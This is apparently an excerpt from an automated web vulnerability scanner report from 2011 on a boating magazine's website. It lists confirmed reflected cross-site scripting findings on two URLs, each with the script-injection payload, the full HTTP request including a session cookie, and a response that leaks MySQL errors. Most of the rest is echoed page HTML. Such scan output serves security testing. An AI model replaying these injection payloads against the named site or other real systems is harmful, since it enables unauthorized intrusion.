href="/boat-shop/used-boat-review?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_used_boat_review m_used_boat_review"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 53, c_used_boat_review<br />Menu: 63, m_used_boat_review-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&am..
- /news/mishaps-a-rescues/

/news/mishaps-a-rescues/ CONFIRMED

http://www.soundingsonline.com/news/mishaps-a-rescues/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0024C8)</script>

Request

GET /news/mishaps-a-rescues/?'"--></style></script><script>netsparker(0x0024C8)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0024C8)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0024C8)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/mishaps-a-rescues/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Coastguard Videos, Reports, and Responses to Mariners</title> <link href="/news/mishaps-a-rescues?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/news/mishaps-a-rescues?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_cg_responses m_cg_responses"><!--
Type of page: category<br />Section: 1, s_news<br />Category: 36, c_cg_responses<br />Menu: 85, m_cg_responses-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"&..
- /searchresults

/searchresults CONFIRMED

http://www.soundingsonline.com/searchresults?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002546)</script>

Request

GET /searchresults?'"--></style></script><script>netsparker(0x002546)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002546)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002546)</script>','','1')' at line 1</font>]</font></blockquote><?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr" >
<head>
<base href="http://www.soundingsonline.com/searchresults" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Search_Results</title> <link href="/templates/searchresults/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" media="screen,projection" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" media="screen,projection" />
<link rel="stylesheet" href="/templates/searchresults/css/allstyles.css" type="text/css" media="screen,projection" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" media="screen,projection" />
<link rel="stylesheet" href="/templates/searchresults/css/editor.css" type="text/css" media="screen,projection" />

<link rel="stylesheet" href="/templates/searchresults/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->
<script src="/templates/searchresults/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/searchresults/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/searchresults/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css">
<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["html","img","swf","flv","iframe","qt","wmp"]
});
</script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc17c.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/search_results.php';
OAS_listpos = 'Right1,Right2,Right3,Top';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
